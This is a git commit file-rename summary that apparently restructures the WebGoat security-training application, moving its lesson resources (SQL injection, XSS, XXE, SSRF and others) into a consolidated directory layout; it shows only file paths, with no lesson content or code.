 rename {webgoat-lessons/path-traversal/src/main/resources => src/main/resources/lessons/path_traversal}/images/cats/3.jpg (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources => src/main/resources/lessons/path_traversal}/images/cats/4.jpg (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources => src/main/resources/lessons/path_traversal}/images/cats/5.jpg (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources => src/main/resources/lessons/path_traversal}/images/cats/6.jpg (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources => src/main/resources/lessons/path_traversal}/images/cats/7.jpg (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources => src/main/resources/lessons/path_traversal}/images/cats/8.jpg (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources => src/main/resources/lessons/path_traversal}/images/cats/9.jpg (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources => src/main/resources/lessons/path_traversal}/js/path_traversal.js (100%)
 rename {webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en => src/main/resources/lessons/secure_passwords/documentation}/SecurePasswords_1.adoc (100%)
 rename {webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en => src/main/resources/lessons/secure_passwords/documentation}/SecurePasswords_2.adoc (100%)
 rename {webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en => src/main/resources/lessons/secure_passwords/documentation}/SecurePasswords_3.adoc (100%)
 rename {webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en => src/main/resources/lessons/secure_passwords/documentation}/SecurePasswords_4.adoc (100%)
 rename {webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en => src/main/resources/lessons/secure_passwords/documentation}/SecurePasswords_assignment_introduction.adoc (100%)
 rename {webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en => src/main/resources/lessons/secure_passwords/documentation}/SecurePasswords_intro.adoc (100%)
 rename {webgoat-lessons/secure-passwords/src/main/resources => src/main/resources/lessons/secure_passwords}/html/SecurePasswords.html (68%)
 rename {webgoat-lessons/secure-passwords/src/main/resources => src/main/resources/lessons/secure_passwords}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/secure-passwords/src/main/resources => src/main/resources/lessons/secure_passwords}/i18n/WebGoatLabels_nl.properties (100%)
 rename {webgoat-lessons/secure-passwords/src/main/resources => src/main/resources/lessons/secure_passwords}/js/questions_cia.json (100%)
 rename {webgoat-lessons => src/main/resources/lessons}/sol.MD (100%)
 rename {webgoat-lessons => src/main/resources/lessons}/sol.txt (100%)
 rename {webgoat-lessons/spoof-cookie/src/main/resources/lessonPlans/en => src/main/resources/lessons/spoofcookie/documentation}/SpoofCookie_content0.adoc (100%)
 rename {webgoat-lessons/spoof-cookie/src/main/resources/lessonPlans/en => src/main/resources/lessons/spoofcookie/documentation}/SpoofCookie_plan.adoc (100%)
 rename {webgoat-lessons/spoof-cookie/src/main/resources => src/main/resources/lessons/spoofcookie}/html/SpoofCookie.html (68%)
 rename {webgoat-lessons/spoof-cookie/src/main/resources => src/main/resources/lessons/spoofcookie}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/spoof-cookie/src/main/resources => src/main/resources/lessons/spoofcookie}/js/handler.js (100%)
 rename {webgoat-lessons/spoof-cookie/src/main/resources => src/main/resources/lessons/spoofcookie}/lessonSolutions/en/SpoofCookie_solution.adoc (100%)
 rename {webgoat-lessons/spoof-cookie/src/main/resources => src/main/resources/lessons/spoofcookie}/lessonSolutions/html/SpoofCookie.html (100%)
 rename {webgoat-lessons/spoof-cookie/src/main/resources => src/main/resources/lessons/spoofcookie}/templates/spoofcookieform.html (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/css/assignments.css (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/css/challenge.css (100%)
 rename {webgoat-container/src/main/resources/static => src/main/resources/lessons/sql_injection}/css/quiz.css (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/db/migration/V2019_09_26_1__servers.sql (54%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/db/migration/V2019_09_26_2__users.sql (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/db/migration/V2019_09_26_3__salaries.sql (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/db/migration/V2019_09_26_4__tan.sql (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/db/migration/V2019_09_26_5__challenge_assignment.sql (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/db/migration/V2019_09_26_6__user_system_data.sql (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/db/migration/V2019_09_26_7__employees.sql (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/db/migration/V2021_03_13_8__grant.sql (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjectionAdvanced_plan.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_challenge.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_content10.adoc (94%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_content11.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_content12.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_content12a.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_content12b.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_content13.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_content14.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_content6.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_content6a.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_content6c.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_content7.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_content8.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_content9.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_introduction_content1.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_introduction_content10.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_introduction_content11.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_introduction_content12.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_introduction_content2.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_introduction_content3.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_introduction_content4.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_introduction_content5_after.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_introduction_content5_before.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_introduction_content6.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_introduction_content7.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_introduction_content8.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_introduction_content9.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_introduction_plan.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_jdbc_completion.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_jdbc_newcode.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_order_by.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en => src/main/resources/lessons/sql_injection/documentation}/SqlInjection_quiz.adoc (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/html/SqlInjection.html (84%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/html/SqlInjectionAdvanced.html (92%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/html/SqlInjectionMitigations.html (84%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources => src/main/resources/lessons/sql_injection}/i18n/WebGoatLabels_de.properties (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources => src/main/resources/lessons/sql_injection}/i18n/WebGoatLabels_fr.properties (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources => src/main/resources/lessons/sql_injection}/i18n/WebGoatLabels_ru.properties (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/js/assignment10b.js (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/js/assignment13.js (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/js/challenge.js (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/sql_injection}/js/questions_sql_injection.json (100%)
 rename {webgoat-lessons/ssrf/src/main/resources/lessonPlans/en => src/main/resources/lessons/ssrf/documentation}/SSRF_Intro.adoc (100%)
 rename {webgoat-lessons/ssrf/src/main/resources/lessonPlans/en => src/main/resources/lessons/ssrf/documentation}/SSRF_Prevent.adoc (100%)
 rename {webgoat-lessons/ssrf/src/main/resources/lessonPlans/en => src/main/resources/lessons/ssrf/documentation}/SSRF_Task1.adoc (100%)
 rename {webgoat-lessons/ssrf/src/main/resources/lessonPlans/en => src/main/resources/lessons/ssrf/documentation}/SSRF_Task2.adoc (100%)
 rename {webgoat-lessons/ssrf/src/main/resources => src/main/resources/lessons/ssrf}/html/SSRF.html (82%)
 rename {webgoat-lessons/ssrf/src/main/resources => src/main/resources/lessons/ssrf}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/ssrf/src/main/resources => src/main/resources/lessons/ssrf}/images/cat.jpg (100%)
 rename {webgoat-lessons/ssrf/src/main/resources => src/main/resources/lessons/ssrf}/images/jerry.png (100%)
 rename {webgoat-lessons/ssrf/src/main/resources => src/main/resources/lessons/ssrf}/images/tom.png (100%)
 rename {webgoat-lessons/ssrf/src/main/resources => src/main/resources/lessons/ssrf}/js/credentials.js (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en => src/main/resources/lessons/vulnerable_components/documentation}/VulnerableComponents_content0.adoc (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en => src/main/resources/lessons/vulnerable_components/documentation}/VulnerableComponents_content1.adoc (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en => src/main/resources/lessons/vulnerable_components/documentation}/VulnerableComponents_content1a.adoc (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en => src/main/resources/lessons/vulnerable_components/documentation}/VulnerableComponents_content2.adoc (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en => src/main/resources/lessons/vulnerable_components/documentation}/VulnerableComponents_content2a.adoc (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en => src/main/resources/lessons/vulnerable_components/documentation}/VulnerableComponents_content3.adoc (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en => src/main/resources/lessons/vulnerable_components/documentation}/VulnerableComponents_content4.adoc (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en => src/main/resources/lessons/vulnerable_components/documentation}/VulnerableComponents_content4a.adoc (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en => src/main/resources/lessons/vulnerable_components/documentation}/VulnerableComponents_content4b.adoc (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en => src/main/resources/lessons/vulnerable_components/documentation}/VulnerableComponents_content4c.adoc (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en => src/main/resources/lessons/vulnerable_components/documentation}/VulnerableComponents_content5.adoc (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en => src/main/resources/lessons/vulnerable_components/documentation}/VulnerableComponents_content5a.adoc (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en => src/main/resources/lessons/vulnerable_components/documentation}/VulnerableComponents_content6.adoc (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en => src/main/resources/lessons/vulnerable_components/documentation}/VulnerableComponents_plan.adoc (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources => src/main/resources/lessons/vulnerable_components}/html/VulnerableComponents.html (68%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources => src/main/resources/lessons/vulnerable_components}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources => src/main/resources/lessons/vulnerable_components}/images/OWASP-2013-A9.png (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources => src/main/resources/lessons/vulnerable_components}/images/OWASP-Dep-Check.png (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources => src/main/resources/lessons/vulnerable_components}/images/Old-Components.png (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources => src/main/resources/lessons/vulnerable_components}/images/OpenSourceGrowing.png (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources => src/main/resources/lessons/vulnerable_components}/images/Risk-of-Old-Components.png (100%)
 rename {webgoat-lessons/vulnerable-components/src/main/resources => src/main/resources/lessons/vulnerable_components}/images/WebGoat-Vulns.png (100%)
 rename {webgoat-lessons/webgoat-introduction/src/main/resources/lessonPlans/en => src/main/resources/lessons/webgoat_introduction/documentation}/Introduction.adoc (100%)
 create mode 100644 src/main/resources/lessons/webgoat_introduction/html/WebGoatIntroduction.html
 rename {webgoat-lessons/webgoat-introduction/src/main/resources => src/main/resources/lessons/webgoat_introduction}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/webgoat-introduction/src/main/resources => src/main/resources/lessons/webgoat_introduction}/images/wg_logo.png (100%)
 rename {webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en => src/main/resources/lessons/webwolf_introduction/documentation}/IntroductionWebWolf.adoc (100%)
 rename {webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en => src/main/resources/lessons/webwolf_introduction/documentation}/Landing_page.adoc (100%)
 rename {webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en => src/main/resources/lessons/webwolf_introduction/documentation}/Receiving_mail.adoc (100%)
 rename {webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en => src/main/resources/lessons/webwolf_introduction/documentation}/Uploading_files.adoc (100%)
 rename {webgoat-lessons/webwolf-introduction/src/main/resources => src/main/resources/lessons/webwolf_introduction}/html/WebWolfIntroduction.html (88%)
 rename {webgoat-lessons/webwolf-introduction/src/main/resources => src/main/resources/lessons/webwolf_introduction}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/webwolf-introduction/src/main/resources => src/main/resources/lessons/webwolf_introduction}/images/files.png (100%)
 rename {webgoat-lessons/webwolf-introduction/src/main/resources => src/main/resources/lessons/webwolf_introduction}/images/mailbox.png (100%)
 rename {webgoat-lessons/webwolf-introduction/src/main/resources => src/main/resources/lessons/webwolf_introduction}/images/requests.png (100%)
 rename {webgoat-lessons/webwolf-introduction/src/main/resources => src/main/resources/lessons/webwolf_introduction}/images/wolf-enabled.png (100%)
 rename {webgoat-lessons/webwolf-introduction/src/main/resources => src/main/resources/lessons/webwolf_introduction}/templates/webwolfPasswordReset.html (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources => src/main/resources/lessons/xss}/css/stored-xss.css (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScriptingMitigation_plan.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScriptingStored_plan.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content1.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content2.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content3.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content4.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content5.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content5a.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content5b.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content6.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content6a.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content6b.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content7-off.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content7.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content7b.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content7c.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content8.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content8a.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content8b.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content8c.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_content9.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_plan.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en => src/main/resources/lessons/xss/documentation}/CrossSiteScripting_quiz.adoc (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources => src/main/resources/lessons/xss}/html/CrossSiteScripting.html (79%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources => src/main/resources/lessons/xss}/html/CrossSiteScriptingMitigation.html (76%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources => src/main/resources/lessons/xss}/html/CrossSiteScriptingStored.html (82%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources => src/main/resources/lessons/xss}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/xss}/i18n/WebGoatLabels_de.properties (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/xss}/i18n/WebGoatLabels_fr.properties (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/lessons/xss}/i18n/WebGoatLabels_ru.properties (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources => src/main/resources/lessons/xss}/images/Reflected-XSS.png (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources => src/main/resources/lessons/xss}/images/Stored-XSS.png (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources => src/main/resources/lessons/xss}/images/avatar1.png (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources => src/main/resources/lessons/xss}/js/assignment3.js (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources => src/main/resources/lessons/xss}/js/assignment4.js (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources => src/main/resources/lessons/xss}/js/questions_cross_site_scripting.json (100%)
 rename {webgoat-lessons/cross-site-scripting/src/main/resources => src/main/resources/lessons/xss}/js/stored-xss.js (100%)
 rename {webgoat-lessons/xxe/src/main/resources => src/main/resources/lessons/xxe}/css/xxe.css (100%)
 rename {webgoat-lessons/xxe/src/main/resources => src/main/resources/lessons/xxe}/csv/flights.txt (100%)
 rename {webgoat-lessons/xxe/src/main/resources/lessonPlans/en => src/main/resources/lessons/xxe/documentation}/XXE_blind.adoc (100%)
 rename {webgoat-lessons/xxe/src/main/resources/lessonPlans/en => src/main/resources/lessons/xxe/documentation}/XXE_blind_assignment.adoc (86%)
 rename {webgoat-lessons/xxe/src/main/resources/lessonPlans/en => src/main/resources/lessons/xxe/documentation}/XXE_changing_content_type.adoc (100%)
 rename {webgoat-lessons/xxe/src/main/resources/lessonPlans/en => src/main/resources/lessons/xxe/documentation}/XXE_changing_content_type_solution.adoc (100%)
 rename {webgoat-lessons/xxe/src/main/resources/lessonPlans/en => src/main/resources/lessons/xxe/documentation}/XXE_code.adoc (100%)
 rename {webgoat-lessons/xxe/src/main/resources/lessonPlans/en => src/main/resources/lessons/xxe/documentation}/XXE_intro.adoc (100%)
 rename {webgoat-lessons/xxe/src/main/resources/lessonPlans/en => src/main/resources/lessons/xxe/documentation}/XXE_mitigation.adoc (100%)
 rename {webgoat-lessons/xxe/src/main/resources/lessonPlans/en => src/main/resources/lessons/xxe/documentation}/XXE_overflow.adoc (100%)
 rename {webgoat-lessons/xxe/src/main/resources/lessonPlans/en => src/main/resources/lessons/xxe/documentation}/XXE_plan.adoc (100%)
 rename {webgoat-lessons/xxe/src/main/resources/lessonPlans/en => src/main/resources/lessons/xxe/documentation}/XXE_simple.adoc (100%)
 rename {webgoat-lessons/xxe/src/main/resources/lessonPlans/en => src/main/resources/lessons/xxe/documentation}/XXE_simple_introduction.adoc (100%)
 rename {webgoat-lessons/xxe/src/main/resources/lessonPlans/en => src/main/resources/lessons/xxe/documentation}/XXE_simple_solution.adoc (100%)
 rename {webgoat-lessons/xxe/src/main/resources/lessonPlans/en => src/main/resources/lessons/xxe/documentation}/XXE_static_code_analysis.adoc (100%)
 rename {webgoat-lessons/xxe/src/main/resources/lessonPlans/en => src/main/resources/lessons/xxe/documentation}/temp.txt (100%)
 rename {webgoat-lessons/xxe/src/main/resources => src/main/resources/lessons/xxe}/html/XXE.html (85%)
 rename {webgoat-lessons/xxe/src/main/resources => src/main/resources/lessons/xxe}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/xxe/src/main/resources => src/main/resources/lessons/xxe}/images/avatar1.png (100%)
 rename {webgoat-lessons/xxe/src/main/resources => src/main/resources/lessons/xxe}/images/cat.jpg (100%)
 rename {webgoat-lessons/xxe/src/main/resources => src/main/resources/lessons/xxe}/images/etc_password.png (100%)
 rename {webgoat-lessons/xxe/src/main/resources => src/main/resources/lessons/xxe}/images/example.dtd (100%)
 rename {webgoat-lessons/xxe/src/main/resources => src/main/resources/lessons/xxe}/images/sonar-issue-xxe.png (100%)
 rename {webgoat-lessons/xxe/src/main/resources => src/main/resources/lessons/xxe}/images/sonar-issues.png (100%)
 rename {webgoat-lessons/xxe/src/main/resources => src/main/resources/lessons/xxe}/images/wolf-enabled.png (100%)
 rename {webgoat-lessons/xxe/src/main/resources => src/main/resources/lessons/xxe}/images/xxe-parser-java.png (100%)
 rename {webgoat-lessons/xxe/src/main/resources => src/main/resources/lessons/xxe}/images/xxe-parser.png (100%)
 rename {webgoat-lessons/xxe/src/main/resources => src/main/resources/lessons/xxe}/images/xxe-suggested-fix.png (100%)
 rename {webgoat-lessons/xxe/src/main/resources => src/main/resources/lessons/xxe}/js/xxe.js (100%)
 rename {webgoat-lessons/xxe/src/main/resources => src/main/resources/lessons/xxe}/secret.txt (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/css/animate.css (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/css/asciidoctor-default.css (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/css/coderay.css (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/css/font-awesome.min.css (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/css/img/appseceu-17.png (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/css/img/favicon.ico (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/css/img/logo.png (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/css/img/logoBG.jpg (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/css/img/owasp_logo.jpg (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/css/img/solution.svg (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/css/img/webBg.png (100%)
 rename {webwolf/src/main/resources/static/images => src/main/resources/webgoat/static/css/img}/wolf.svg (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/css/layers.css (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/css/main.css (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/css/menu.css (100%)
 rename {webgoat-lessons/sql-injection/src/main/resources => src/main/resources/webgoat/static}/css/quiz.css (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/css/webgoat.css (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/fonts/FontAwesome.otf (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/fonts/fontawesome-webfont.eot (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/fonts/fontawesome-webfont.svg (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/fonts/fontawesome-webfont.ttf (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/fonts/fontawesome-webfont.woff (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/application.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/controller/LessonController.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/controller/MenuController.js (100%)
 rename {webgoat-container/src/main/resources => src/main/resources/webgoat}/static/js/goatApp/goatApp.js (100%)
